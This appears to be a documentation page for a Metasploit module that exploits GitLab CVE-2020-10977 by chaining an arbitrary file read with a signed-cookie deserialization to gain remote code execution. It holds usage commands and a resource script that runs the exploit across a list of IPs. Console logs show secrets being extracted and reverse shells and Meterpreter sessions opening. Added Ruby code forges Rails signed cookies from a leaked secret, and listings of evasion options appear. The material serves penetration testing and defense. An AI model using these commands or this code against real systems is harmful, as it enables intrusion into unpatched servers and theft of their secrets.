GitLab File Read Remote Code Execution - Metasploit
This page contains detailed information about how to use the exploit/multi/http/gitlab_file_read_rce Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: GitLab File Read Remote Code Execution
Module: exploit/multi/http/gitlab_file_read_rce
Source code: modules/exploits/multi/http/gitlab_file_read_rce.rb
Disclosure date: 2020-03-26
Last modification time: 2021-08-27 17:15:33 +0000
Supported architecture(s): ruby
Supported platform(s): Ruby
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2020-10977
This module provides remote code execution against GitLab Community Edition (CE) and Enterprise Edition (EE). It combines an arbitrary file read to extract the Rails "secret_key_base", and gains remote code execution with a deserialization vulnerability of a signed 'experimentation_subject_id' cookie that GitLab uses internally for A/B testing. Note that the arbitrary file read exists in GitLab EE/CE 8.5 and later, and was fixed in 12.9.1, 12.8.8, and 12.7.8. However, the RCE only affects versions 12.4.0 and above, where the vulnerable experimentation_subject_id cookie was introduced. Tested on GitLab 12.8.1 and 12.4.0.
Module Ranking and Traits
Module Ranking:
- excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.
Reliability:
- repeatable-session: The module is expected to get a shell every time it runs.
Stability:
- crash-safe: Module should not crash the service.
Side Effects:
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
- artifacts-on-disk: Module leaves a payload or a dropper on the target machine.
Basic Usage
Using gitlab_file_read_rce against a single host
Normally, you can use exploit/multi/http/gitlab_file_read_rce this way:
msf > use exploit/multi/http/gitlab_file_read_rce
msf exploit(gitlab_file_read_rce) > show targets
... a list of targets ...
msf exploit(gitlab_file_read_rce) > set TARGET target-id
msf exploit(gitlab_file_read_rce) > show options
... show and set options ...
msf exploit(gitlab_file_read_rce) > exploit
Using gitlab_file_read_rce against multiple hosts
This is a remote exploit module, so you can also run it against multiple hosts.
First, create a list of IPs you wish to exploit with this module. One IP per line.
Second, set up a background payload listener. This payload should be the same as the one your gitlab_file_read_rce will be using:
- Do:
use exploit/multi/handler
- Do:
set PAYLOAD [payload]
- Set other options required by the payload
- Do:
set EXITONSESSION false
- Do:
run -j
At this point, you should have a payload listening.
Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:
<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'
File.open(ip_list, 'rb').each_line do |ip|
  ip = ip.strip        # drop the trailing newline before handing it to 'set'
  next if ip.empty?    # skip blank lines in the list
  print_status("Trying against #{ip}")
  run_single("use exploit/multi/http/gitlab_file_read_rce")
  run_single("set RHOSTS #{ip}")
  run_single("set DisablePayloadHandler true")
  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")
  run_single("run")
end
</ruby>
Next, run the resource script in the console:
msf > resource [path-to-resource-script]
Finally, you should see the exploit running against those hosts, similar to the following MS08-067 example:
msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80
RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600
[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Knowledge Base
Vulnerable Application
Description
This module provides remote code execution against GitLab Community Edition (CE) and Enterprise Edition (EE). It combines an arbitrary file read to extract the Rails "secret_key_base", and gains remote code execution with a deserialization vulnerability of a signed 'experimentation_subject_id' cookie that GitLab uses internally for A/B testing. Once secret_key_base is known, the attacker can produce a validly signed cookie carrying a serialized object of their choosing; the application accepts the signature and deserializes it, and the resulting shell runs as the git user (see the Scenarios section).
Note that the arbitrary file read exists in GitLab EE/CE 8.5 and later, and was fixed in 12.9.1, 12.8.8, and 12.7.8. However, the RCE only affects versions 12.4.0 and above, where the vulnerable experimentation_subject_id cookie was introduced.
Tested on GitLab 12.8.1 and 12.4.0.
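To make the second half of the chain concrete, here is an added example (it is not code from the module, from Metasploit or from GitLab) that reproduces how a Rails 5/6 application signs and verifies a cookie with the framework's defaults: the signing key is derived from secret_key_base with PBKDF2-HMAC-SHA1 using the salt and iteration count that appear in this module's SignedCookieSalt and KeyGeneratorIterations advanced options, and the cookie value is the strict base64 of Marshal.dump(obj), then "--", then a hex HMAC-SHA1 over that base64. The secret_key_base and the cookie payload below are constructed for the example; that these are the server's parameters is an assumption, the same one the module relies on. The function to look at is the last one: a verifier configured with the Marshal serializer hands any payload carrying a valid signature straight to Marshal.load, so once the secret has leaked the signature no longer separates trusted data from attacker data.

```ruby
require 'openssl'

# Rails defaults, matching this module's KeyGeneratorIterations and
# SignedCookieSalt advanced options. Assumed to be the server's settings.
KEY_ITERATIONS = 1000
SIGNED_COOKIE_SALT = 'signed cookie'
KEY_LENGTH = 64 # ActiveSupport::KeyGenerator default key size in bytes

# ActiveSupport::KeyGenerator: PBKDF2-HMAC-SHA1(secret_key_base, salt, iterations).
def derive_signing_key(secret_key_base, salt: SIGNED_COOKIE_SALT, iterations: KEY_ITERATIONS)
  OpenSSL::PKCS5.pbkdf2_hmac_sha1(secret_key_base, salt, iterations, KEY_LENGTH)
end

# What ActiveSupport::MessageVerifier#generate produces for cookies.signed[...]:
# "<strict base64 of Marshal.dump(obj)>--<hex HMAC-SHA1 over that base64>".
# Anyone holding secret_key_base can run this for an object of their choosing.
def sign_cookie(secret_key_base, obj)
  data = [Marshal.dump(obj)].pack('m0')
  "#{data}--#{OpenSSL::HMAC.hexdigest('SHA1', derive_signing_key(secret_key_base), data)}"
end

# Length check plus OR-accumulated XOR, so comparison time does not depend on
# where the first mismatching byte sits.
def constant_time_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).inject(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Server side, step one: check the signature and return the raw serialized
# bytes, or nil if the cookie is malformed or the HMAC does not match.
def verify_cookie(secret_key_base, cookie)
  data, digest = cookie.to_s.split('--', 2)
  return nil if data.nil? || digest.nil?
  expected = OpenSSL::HMAC.hexdigest('SHA1', derive_signing_key(secret_key_base), data)
  return nil unless constant_time_equal?(expected, digest)
  data.unpack1('m0')
rescue ArgumentError # not valid strict base64
  nil
end

# Server side, step two, and the actual weakness: a verifier built with
# serializer: Marshal passes every correctly signed payload to Marshal.load.
# With the secret leaked, a valid signature says nothing about who made it.
def read_signed_cookie(secret_key_base, cookie)
  payload = verify_cookie(secret_key_base, cookie)
  payload.nil? ? nil : Marshal.load(payload)
end

if __FILE__ == $PROGRAM_NAME
  # Constructed for the example; a real secret_key_base is 128 hex characters.
  secret = 'f' * 128
  forged = sign_cookie(secret, 'experiment-subject-0001')
  puts "cookie value : #{forged}"
  puts "server reads : #{read_signed_cookie(secret, forged).inspect}"
  puts "wrong secret : #{read_signed_cookie('0' * 128, forged).inspect}"
end
```

The benign string payload above is deliberately harmless; the module's real payload is a Marshal gadget chain, and nothing in this example depends on it. Two defensive conclusions follow directly from the code: secret_key_base must be rotated (invalidating every existing signed cookie and session) after any suspected file read, and a cookie serializer that cannot instantiate arbitrary objects, such as Rails' `cookies_serializer = :json`, keeps a forged cookie from ever reaching Marshal.load.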
Setup
Running GitLab 12.8.1 with docker:
sudo docker run \
--rm \
--publish 443:443 --publish 80:80 --publish 22:22 \
--name gitlab \
gitlab/gitlab-ee:12.8.1-ee.0
The application will be available on port 80 or 443. Initial startup of the container can take several minutes.
Setting up SSL
This step is optional and only required if you wish to enable HTTPS for an arbitrary test URL such as gitlab.example.com.
Connect to the running GitLab instance:
sudo docker exec -it gitlab /bin/bash
Add these lines to /etc/gitlab/gitlab.rb:
external_url "https://gitlab.example.com"
letsencrypt['enable'] = false
Use OpenSSL to create a self signed certificate and key:
mkdir -p /etc/gitlab/ssl
chmod 755 /etc/gitlab/ssl
cd /etc/gitlab/ssl
openssl req -x509 -sha256 -nodes -days 365 -newkey rsa:2048 -keyout gitlab.example.com.key -out gitlab.example.com.crt
Reconfigure GitLab:
gitlab-ctl reconfigure
On your host machine modify your /etc/hosts file:
127.0.0.1 gitlab.example.com
Visit the test URL in your browser and either ignore the certificate warnings or add it to continue:
https://gitlab.example.com/
Creating a user
You can either create a user account normally or programmatically as shown below.
Connect to the running GitLab instance:
sudo docker exec -it gitlab /bin/bash
Open an interactive rails console:
gitlab-rails console -e production
Optional - Set the GitLab root account credentials:
admin = User.where(id: 1).first
admin.update!(
password: 'password123',
password_confirmation: 'password123',
confirmation_token: nil,
confirmed_at: Time.now,
confirmation_sent_at: nil,
failed_attempts: 0
)
admin.skip_reconfirmation!
Create a normal user account:
user = User.new(
username: 'test',
name: 'test',
email: '[email protected]',
password: 'password123',
password_confirmation: 'password123',
confirmation_token: nil,
confirmed_at: Time.now,
confirmation_sent_at: nil,
failed_attempts: 0
)
user.save!
user.skip_confirmation!
Once finished, kill the running docker container with:
docker kill gitlab
Verification Steps
Check:
- Run the application
- Start msfconsole
use exploit/multi/http/gitlab_file_read_rce
set RPORT <port>
set RHOST <ip>
set USERNAME [email protected]
set PASSWORD password123
check
[*] 10.10.10.111:9999 - The target appears to be vulnerable. GitLab 12.8.1 is a vulnerable version.
Run:
- Run the application
- Start msfconsole
use exploit/multi/http/gitlab_file_read_rce
set RPORT <port>
set RHOST <ip>
set USERNAME [email protected]
set PASSWORD password123
set LPORT <port>
set LHOST <ip>
run
- You should get a shell.
Specifying a SECRET_KEY_BASE to avoid the arbitrary file read:
- Run the application
- Start msfconsole
use exploit/multi/http/gitlab_file_read_rce
set RPORT <port>
set RHOST <ip>
set SECRET_KEY_BASE 301ee96a664dc634b8766368d26b4ef4deb46c593490dc1f39526e0f278f2dfcb9f5c9bb13c74b5377848259a533c9ad137885c01a4387deb799e14589a6fbac
set LPORT <port>
set LHOST <ip>
run
- You should get a shell.
Scenarios
Arbitrary File Read to RCE
msf6 exploit(multi/http/gitlab_file_read_rce) > options

Module options (exploit/multi/http/gitlab_file_read_rce):

   Name             Current Setting                                               Required  Description
   ----             ---------------                                               --------  -----------
   DEPTH            15                                                            yes       Define the max traversal depth
   PASSWORD         password123                                                   yes       The password for the specified username
   Proxies                                                                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS           127.0.0.1                                                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT            80                                                            yes       The target port (TCP)
   SECRETS_PATH     /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml  yes       The path to the secrets.yml file
   SECRET_KEY_BASE                                                                no        The known secret_key_base from the secrets.yml - this skips the arbitrary file read if present
   SSL              false                                                         no        Negotiate SSL/TLS for outgoing connections
   TARGETURI        /users/sign_in                                                yes       The path to the vulnerable application
   USERNAME         [email protected]                                             yes       The username to authenticate as
   VHOST            gitlab.example.com                                            no        The virtual host name to use in requests

Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  docker0          yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic
msf6 exploit(multi/http/gitlab_file_read_rce) > rerun
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. GitLab 12.8.1 is a vulnerable version.
[*] Logged in to user test
[*] Created project /test/pKUuduxC
[*] Created project /test/5W350yP1
[*] created issue /test/pKUuduxC/issues/1
[*] Executing arbitrary file load
[+] File saved as: '/home/kali/.msf4/loot/20201121213408_default_127.0.0.1_gitlab.secrets_675303.txt'
[+] Extracted secret_key_base e41f3a01d22ff6a694be33bf2e5d40af89b788088938203c3478818da595731ada41c2b9c3d3caff79de7647a0c287bb68f6ca1912904a766237543013c46594
[*] Attempting to delete project /test/pKUuduxC
[*] Command shell session 23 opened (172.17.0.1:4444 -> 172.17.0.2:34058) at 2020-11-21 21:34:08 -0500
[*] Deleted project /test/pKUuduxC
[*] Attempting to delete project /test/5W350yP1
[*] Deleted project /test/5W350yP1
whoami
git
^Z
Background session 23? [y/N] y
msf6 exploit(multi/http/gitlab_file_read_rce) > sessions -u 23
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [23]
[!] SESSION may not be compatible with this module.
[*] Upgrading session ID: 23
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.17.0.1:4433
[*] Sending stage (976712 bytes) to 172.17.0.2
[*] Meterpreter session 24 opened (172.17.0.1:4433 -> 172.17.0.2:45442) at 2020-11-21 21:34:34 -0500
[*] Command stager progress: 100.00% (773/773 bytes)
msf6 exploit(multi/http/gitlab_file_read_rce) > sessions

Active sessions
===============

  Id  Name  Type                   Information                                                               Connection
  --  ----  ----                   -----------                                                               ----------
  23        shell ruby/ruby                                                                                  172.17.0.1:4444 -> 172.17.0.2:34058 (127.0.0.1)
  24        meterpreter x86/linux  git @ 622b6a4c6722 (uid=998, gid=998, euid=998, egid=998) @ 172.17.0.2  172.17.0.1:4433 -> 172.17.0.2:45442 (172.17.0.2)

msf6 exploit(multi/http/gitlab_file_read_rce) >
Specifying SECRET_KEY_BASE to RCE
msf6 exploit(multi/http/gitlab_file_read_rce) > options

Module options (exploit/multi/http/gitlab_file_read_rce):

   Name             Current Setting                                                                                                                   Required  Description
   ----             ---------------                                                                                                                   --------  -----------
   DEPTH            15                                                                                                                                yes       Define the max traversal depth
   PASSWORD                                                                                                                                           no        The password for the specified username
   Proxies                                                                                                                                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS           127.0.0.1                                                                                                                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT            80                                                                                                                                yes       The target port (TCP)
   SECRETS_PATH     /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml                                                                      yes       The path to the secrets.yml file
   SECRET_KEY_BASE  301ee96a664dc634b8766368d26b4ef4deb46c593490dc1f39526e0f278f2dfcb9f5c9bb13c74b5377848259a533c9ad137885c01a4387deb799e14589a6fbac  no        The known secret_key_base from the secrets.yml - this skips the arbitrary file read if present
   SSL              false                                                                                                                             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI        /users/sign_in                                                                                                                    yes       The path to the vulnerable application
   USERNAME                                                                                                                                           no        The username to authenticate as
   VHOST            gitlab.example.com                                                                                                                no        HTTP server virtual host

Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  docker0          yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic
msf6 exploit(multi/http/gitlab_file_read_rce) > run
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. GitLab 12.8.1 is a vulnerable version.
[*] Command shell session 12 opened (172.17.0.1:4444 -> 172.17.0.2:58026) at 2020-12-06 19:53:24 -0500
^Z
Background session 12? [y/N] y
msf6 exploit(multi/http/gitlab_file_read_rce) > sessions -u 12
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [12]
[!] SESSION may not be compatible with this module.
[*] Upgrading session ID: 12
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.17.0.1:4433
[*] Sending stage (976712 bytes) to 172.17.0.2
[*] Meterpreter session 13 opened (172.17.0.1:4433 -> 172.17.0.2:56876) at 2020-12-06 19:53:42 -0500
[*] Command stager progress: 100.00% (773/773 bytes)
msf6 exploit(multi/http/gitlab_file_read_rce) > sessions

Active sessions
===============

  Id  Name  Type                   Information                                                               Connection
  --  ----  ----                   -----------                                                               ----------
  12        shell ruby/ruby                                                                                  172.17.0.1:4444 -> 172.17.0.2:58026 (127.0.0.1)
  13        meterpreter x86/linux  git @ 5d733775a28a (uid=998, gid=998, euid=998, egid=998) @ 172.17.0.2  172.17.0.1:4433 -> 172.17.0.2:56876 (172.17.0.2)

msf6 exploit(multi/http/gitlab_file_read_rce) >
Msfconsole Usage
Here is how the multi/http/gitlab_file_read_rce exploit module looks in the msfconsole:
msf6 > use exploit/multi/http/gitlab_file_read_rce
[*] No payload configured, defaulting to generic/shell_reverse_tcp
msf6 exploit(multi/http/gitlab_file_read_rce) > show info
Name: GitLab File Read Remote Code Execution
Module: exploit/multi/http/gitlab_file_read_rce
Platform: Ruby
Arch: ruby
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2020-03-26
Provided by:
William Bowling (vakzz)
alanfoster
Module side effects:
ioc-in-logs
artifacts-on-disk
Module stability:
crash-safe
Module reliability:
repeatable-session
Available targets:
Id Name
-- ----
0 Automatic
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
DEPTH 15 yes Define the max traversal depth
PASSWORD no The password for the specified username
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SECRETS_PATH /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml yes The path to the secrets.yml file
SECRET_KEY_BASE no The known secret_key_base from the secrets.yml - this skips the arbitrary file read if present
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /users/sign_in yes The path to the vulnerable application
USERNAME no The username to authenticate as
VHOST no HTTP server virtual host
Payload information:
Description:
This module provides remote code execution against GitLab Community
Edition (CE) and Enterprise Edition (EE). It combines an arbitrary
file read to extract the Rails "secret_key_base", and gains remote
code execution with a deserialization vulnerability of a signed
'experimentation_subject_id' cookie that GitLab uses internally for
A/B testing. Note that the arbitrary file read exists in GitLab
EE/CE 8.5 and later, and was fixed in 12.9.1, 12.8.8, and 12.7.8.
However, the RCE only affects versions 12.4.0 and above when the
vulnerable `experimentation_subject_id` cookie was introduced.
Tested on GitLab 12.8.1 and 12.4.0.
References:
https://nvd.nist.gov/vuln/detail/CVE-2020-10977
https://hackerone.com/reports/827052
https://about.gitlab.com/releases/2020/03/26/security-release-12-dot-9-dot-1-released/
Module Options
This is a complete list of options available in the multi/http/gitlab_file_read_rce exploit:
msf6 exploit(multi/http/gitlab_file_read_rce) > show options
Module options (exploit/multi/http/gitlab_file_read_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
DEPTH 15 yes Define the max traversal depth
PASSWORD no The password for the specified username
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SECRETS_PATH /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml yes The path to the secrets.yml file
SECRET_KEY_BASE no The known secret_key_base from the secrets.yml - this skips the arbitrary file read if present
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /users/sign_in yes The path to the vulnerable application
USERNAME no The username to authenticate as
VHOST no HTTP server virtual host
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.204.3 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
Advanced Options
Here is a complete list of advanced options supported by the multi/http/gitlab_file_read_rce exploit:
msf6 exploit(multi/http/gitlab_file_read_rce) > show advanced
Module advanced options (exploit/multi/http/gitlab_file_read_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoCheck true no Run check before exploit
ContextInformationFile no The information file that contains context information
DOMAIN WORKSTATION yes The domain to use for Windows authentication
DigestAuthIIS true no Conform to IIS, should work for most servers. Only set to false for non-IIS servers
DisablePayloadHandler false no Disable the handler code for the selected payload
EnableContextEncoding false no Use transient context when encoding payloads
FingerprintCheck true no Conduct a pre-exploit fingerprint verification
ForceExploit false no Override check result
HttpClientTimeout no HTTP connection and receive timeout
HttpPassword no The HTTP password to specify for authentication
HttpRawHeaders no Path to ERB-templatized raw headers to append to existing headers
HttpTrace false no Show the raw HTTP requests and responses
HttpTraceColors red/blu no HTTP request and response colors for HttpTrace (unset to disable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
HttpUsername no The HTTP username to specify for authentication
KeyGeneratorIterations 1000 yes The key generator iterations
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
SignedCookieSalt signed cookie yes The signed cookie salt
UserAgent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) no The User-Agent header to use for all requests
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WfsDelay 2 no Additional delay in seconds to wait for a session
Payload advanced options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
ARCH no The architecture that is being targeted
PLATFORM no The platform that is being targeted
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the multi/http/gitlab_file_read_rce module can exploit:
msf6 exploit(multi/http/gitlab_file_read_rce) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the multi/http/gitlab_file_read_rce exploit:
msf6 exploit(multi/http/gitlab_file_read_rce) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/generic/custom normal No Custom Payload
1 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
2 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
3 payload/multi/meterpreter/reverse_http normal No Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
4 payload/multi/meterpreter/reverse_https normal No Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
5 payload/ruby/pingback_bind_tcp normal No Ruby Pingback, Bind TCP
6 payload/ruby/pingback_reverse_tcp normal No Ruby Pingback, Reverse TCP
7 payload/ruby/shell_bind_tcp normal No Ruby Command Shell, Bind TCP
8 payload/ruby/shell_bind_tcp_ipv6 normal No Ruby Command Shell, Bind TCP IPv6
9 payload/ruby/shell_reverse_tcp normal No Ruby Command Shell, Reverse TCP
10 payload/ruby/shell_reverse_tcp_ssl normal No Ruby Command Shell, Reverse TCP SSL
Evasion Options
Here is the full list of possible evasion options supported by the multi/http/gitlab_file_read_rce exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(multi/http/gitlab_file_read_rce) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::method_random_case false no Use random casing for the HTTP method
HTTP::method_random_invalid false no Use a random invalid, HTTP method for request
HTTP::method_random_valid false no Use a random, but valid, HTTP method for request
HTTP::pad_fake_headers false no Insert random, fake headers into the HTTP request
HTTP::pad_fake_headers_count 0 no How many fake headers to insert into the HTTP request
HTTP::pad_get_params false no Insert random, fake query string variables into the request
HTTP::pad_get_params_count 16 no How many fake query string variables to insert into the request
HTTP::pad_method_uri_count 1 no How many whitespace characters to use between the method and uri
HTTP::pad_method_uri_type space no What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
HTTP::pad_post_params false no Insert random, fake post variables into the request
HTTP::pad_post_params_count 16 no How many fake post variables to insert into the request
HTTP::pad_uri_version_count 1 no How many whitespace characters to use between the uri and version
HTTP::pad_uri_version_type space no What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
HTTP::uri_dir_fake_relative false no Insert fake relative directories into the uri
HTTP::uri_dir_self_reference false no Insert self-referential directories into the uri
HTTP::uri_encode_mode hex-normal no Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
HTTP::uri_fake_end false no Add a fake end of URI (eg: /%20HTTP/1.0/../../)
HTTP::uri_fake_params_start false no Add a fake start of params to the URI (eg: /%3fa=b/../)
HTTP::uri_full_url false no Use the full URL for all HTTP requests
HTTP::uri_use_backslashes false no Use back slashes instead of forward slashes in the uri
HTTP::version_random_invalid false no Use a random invalid, HTTP version for request
HTTP::version_random_valid false no Use a random, but valid, HTTP version for request
Error Messages
This module may fail with the following error messages. Note that the first two are the results of the version check, not failures of the exploit itself.
Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
GitLab <VERSION> is a vulnerable version.
Here is a relevant code snippet related to the "GitLab <VERSION> is a vulnerable version." error message:
458: version.between?(Rex::Version.new('12.4.0'), Rex::Version.new('12.7.7')) ||
459: version.between?(Rex::Version.new('12.8.0'), Rex::Version.new('12.8.7')) ||
460: version == Rex::Version.new('12.9.0')
461: )
462: if has_rce_present
463: return Exploit::CheckCode::Appears("GitLab #{version} is a vulnerable version.")
464: end
465:
466: Exploit::CheckCode::Safe("GitLab #{version} is not a vulnerable version.")
467: rescue GitLabClientException => e
468: Exploit::CheckCode::Unknown(e.message)
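The check above only decides between "vulnerable to the full chain" and "safe", but the page also states a wider range in which the file read alone exists (8.5 and later, fixed in 12.7.8, 12.8.8 and 12.9.1). The following added example, written for this page and not taken from the module, classifies a version string into three buckets using exactly the ranges quoted on this page, which is what you want when triaging an inventory rather than a single target. Gem::Version stands in for Rex::Version, and the handling of the "-ee"/"-ce" edition suffix is my assumption about how GitLab reports its version; without stripping it, Gem::Version would treat "12.8.1-ee" as a prerelease that sorts below 12.8.1.

```ruby
require 'rubygems' # Gem::Version; loaded by default on modern Ruby

# Version boundaries as stated on this page (check code and description).
RCE_RANGES = [
  ['12.4.0', '12.7.7'],
  ['12.8.0', '12.8.7'],
  ['12.9.0', '12.9.0']
].freeze
FILE_READ_FIRST = '8.5.0'   # arbitrary file read exists from 8.5 on
RCE_FIRST       = '12.4.0'  # experimentation_subject_id cookie introduced

# Normalise "12.8.1-ee" / "12.3.9-ce" to a plain Gem::Version.
# Assumption: the only suffix GitLab appends is the edition tag.
def parse_gitlab_version(version_string)
  Gem::Version.new(version_string.to_s.strip.sub(/-(ee|ce)\z/i, ''))
end

def in_range?(v, low, high)
  v.between?(Gem::Version.new(low), Gem::Version.new(high))
end

# Returns :rce (full chain), :file_read_only (secrets leak but no cookie RCE)
# or :not_affected. Mirrors the module's has_rce_present logic for :rce.
def classify_gitlab_version(version_string)
  v = parse_gitlab_version(version_string)
  return :rce if RCE_RANGES.any? { |low, high| in_range?(v, low, high) }

  # Versions between 8.5 and the introduction of the cookie only leak the
  # secrets file; anything at or above RCE_FIRST not matched above is fixed.
  if v >= Gem::Version.new(FILE_READ_FIRST) && v < Gem::Version.new(RCE_FIRST)
    :file_read_only
  else
    :not_affected
  end
end

# Triage a list of (host, version) pairs; returns { host => bucket }.
def triage(inventory)
  inventory.to_h { |host, version| [host, classify_gitlab_version(version)] }
end

if __FILE__ == $PROGRAM_NAME
  # Constructed inventory for the example.
  sample = [
    ['gitlab-a.example', '12.8.1-ee'],
    ['gitlab-b.example', '12.3.9-ce'],
    ['gitlab-c.example', '12.9.1-ee'],
    ['gitlab-d.example', '8.4.0']
  ]
  triage(sample).each { |host, bucket| puts format('%-20s %s', host, bucket) }
end
```

Use the :file_read_only bucket as a reason to rotate secret_key_base as well, not just to patch: the secret is still readable on those versions even though this module cannot turn it into a shell there.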
GitLab <VERSION> is not a vulnerable version.
Here is a relevant code snippet related to the "GitLab <VERSION> is not a vulnerable version." error message:
461: )
462: if has_rce_present
463: return Exploit::CheckCode::Appears("GitLab #{version} is a vulnerable version.")
464: end
465:
466: Exploit::CheckCode::Safe("GitLab #{version} is not a vulnerable version.")
467: rescue GitLabClientException => e
468: Exploit::CheckCode::Unknown(e.message)
469: end
470:
471: def validate_credentials_present!
Unable to successfully extract leaked secret_key_base value
Here is a relevant code snippet related to the "Unable to successfully extract leaked secret_key_base value" error message:
507: loot_path = store_loot('gitlab.secrets', 'text/plain', datastore['RHOST'], secrets_yml, 'secrets.yml')
508: print_good("File saved as: '#{loot_path}'")
509:
